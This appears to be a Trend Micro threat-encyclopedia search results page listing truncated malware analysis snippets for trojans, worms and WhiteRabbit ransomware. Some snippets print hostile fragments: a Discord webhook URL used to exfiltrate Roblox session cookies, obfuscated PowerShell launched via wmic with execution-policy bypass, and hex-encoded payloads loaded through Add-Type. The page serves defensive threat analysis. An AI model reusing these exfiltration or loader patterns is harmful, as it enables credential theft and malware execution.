Search

Keyword: troj _ vundo

44733 Total Search | Showing Results : 21 - 40

Previous Next

https://discordapp.com/api/webhooks/292933102060437504/6dkH6MUyHmo9IZ0ImsKH7Z-Xo7CdG_EGTQGfj8RDzJPgkyIA5FTUWKZCf6gSO9UqagzN --> NOTES: The message sent to discord is in the following format: _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_{random hex

DDI-RULE-2190

Description Name: VUNDO - HTTP (Request) . This is Trend Micro detection for packets passing through HTTP network protocols that can be used as N/A. This also indicates a malware infection. Below are some indicators of an infected host:Excessive spam...

TROJ_AGENT_043703.TOMB

\DD_VCR~2.TXT %User Temp%\DD_VCR~4.TXT %User Temp%\DD_VCR~1.TXT %User Temp%\DD_VCR~3.TXT %User Temp%\PERFLI~1.DAT %User Temp%\PERFLI~2.DAT %User Temp%\_$Df\DF6Wks.sib (Note: %System% is the Windows system folder,

Trojan.X97M.POWLOAD.USMANFOGDG

[Io.coMPRESsiOn.COmpReSsiONmode]::DEcOmpReSs )| %{NeW-OBJect iO.stREAmReaDEr( `$_ "\" + ([ChAR]44).ToString() + "\"[TExT.ENcodING]::ASCiI)} ).ReadtoEND( ) "\")" wmic PRoCEss 'call' "CReatE" "pOWERSHElL -eP BypaSS -NONinTER

WORM_PHORPIEX.THFADAI

it usually is C:\Windows on all Windows operating system versions.) It drops the following files: {removable and network drive letter}:\.lnk -> shortcut to {removable and network drive letter}:\_

WORM_PHORPIEX.YOV

{removable or network drive}:\_ %Windows%\M-5050480268465846240752862405642857248045 %User Temp%\ns{5-random characters}.tmp (Note: %Windows% is the Windows folder, where it usually is C:\Windows on all

TROJ_AGENT_013432.TOMB

]:Trojan-PSW.PHP.AccPhish.eu, [$_EVENTS]:Trojan-PSW.PHP.AccPhish.v, [$_ (Kaspersky); Trojan.Win32.Generic.pak!cobra (Sunbelt)

Trojan.W97M.LOKI.ANT

5d5c5856510500561b28035b03410c5d5c4f08564f4e064c100315150351025459760b084301471048610b771d12504c56510500561b3713571741160f5b031d0d4a074d1955501c5f4c565154571e594e560c54164f1d1503510254446b4410060704063d1d0d1a564f15411512555655574a2a500a52100e684d0e19145010401608151d075307065f4819';Rk##$TRRk##$*R$ga39982 = zc523($ga3998);Rk##$TRRk##$*RAdd-Type -TypeDefinition $ga39982;Rk##$TRRk##$*R[ze2131]::x4bb57();Rk##$TRRk##$*RRk##$TRRk##$*RRk##$TRRk##$*_ Dropping

Worm.Win32.DORKBOT.TIGAAAW

unknowingly by users when visiting malicious sites. Installation This Worm drops the following files: {Removable Drive}:\_\autorun.inf -> contains the following strings "[AUtoRuN]",LF,"ShEllExECUte=__

WORM_PHORPIEX.YOP

{removable or network drive}:\_ %Windows%\M-505038403028403028485929287348745929273958292048430 %User Temp%\ns{5-random characters}.tmp (Note: %Windows% is the Windows folder, where it usually is C:\Windows on

Trojan.W97M.POWLOAD.TIOIBEKV

);Sl$$%-SSl$$%*SAdd-Type -TypeDefinition $v8e4462;Sl$$%-SSl$$%*S[pfb241]::re32e();Sl$$%-SSl$$%*SSl$$%-SSl$$%*SSl$$%-SSl$$%*_ Dropping Routine This Trojan drops the following files: {malware file path and

Ransom.Win32.WHITERABBIT.YACAET

rtvscan qbfcservice qbidpservice intuit.quickbooks.fcs qbcfmonitorservice yoobackup yooit zhudongfangyu stc _ raw _ agent vsnapvss veeamtransportsvc veeamdeploymentservice veeamnfssvc pdvfsservice

Ransom.Win32.WHITERABBIT.RGNS

gxvss gxblr gxfwd gxcvd gxcimgr defwatch ccevtmgr ccsetmgr savroam rtvscan qbfcservice qbidpservice intuit.quickbooks.fcs qbcfmonitorservice yoobackup yooit zhudongfangyu stc _ raw _ agent vsnapvss

TROJ_RANSOM.EDW

files: %User Temp%\DD_VCR~2.TXT %User Temp%\DD_VCR~4.TXT %User Temp%\DD_VCR~1.TXT %User Temp%\DD_VCR~3.TXT %User Temp%\PERFLI~1.DAT %User Temp%\PERFLI~2.DAT %User Temp%\_$Df\DF6Wks.sib (Note: %User Temp%

TSPY_INFOSTL.QQP

is generated via an automated analysis system. Trojan:Win32/PossibleMalware.A, Trojan:Win32/PossibleMalware.A, Trojan:Win32/PossibleMalware.A, Troj (Microsoft); Backdoor.Trojan (Symantec);

TROJ_INJECT.KYU

creates the following folders: ()*+,-./0123456789:;=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSÿì_CHAR(0x17)__CHAR(0x01)_XYZ{}~êÔG®_CHAR(0x19)__CHAR(0x01)_ÿÿÿÿü_CHAR(0x12)_ %User Profile%

Ransom.Win32.WHITERABBIT.YPEDG

intuit.quickbooks.fcs qbcfmonitorservice yoobackup yooit zhudongfangyu stc _ raw _ agent vsnapvss veeamtransportsvc veeamdeploymentservice veeamnfssvc pdvfsservice backupexecvssprovider backupexeca-gentaccelerator

TROJ_DROPR.MA

following files: __tmp_rar_sfx_access_check_121156 %User Temp%\RarSFX0\_CHAR(0x04)_ _ PBArVzWJrYnjUO (Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name

TROJ_RASFTUBY.DAM

following files: __tmp_rar_sfx_access_check_361843 %User Temp%\RarSFX0\_CHAR(0x04)_ _ BSGxBArVzWJrYn (Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name

TROJ_RASFTUBY.A

following files: __tmp_rar_sfx_access_check_76640 %User Temp%\RarSFX0\_CHAR(0x04)_ _ YSGxBArVzWJr (Note: %User Temp% is the user's temporary folder, where it usually is C:\Documents and Settings\{user name}

Search

Resources

Support

About Trend

Country Headquarters

Search

Resources

Support

About Trend

Country Headquarters

The Americas

Middle East & Africa

Europe

Asia & Pacific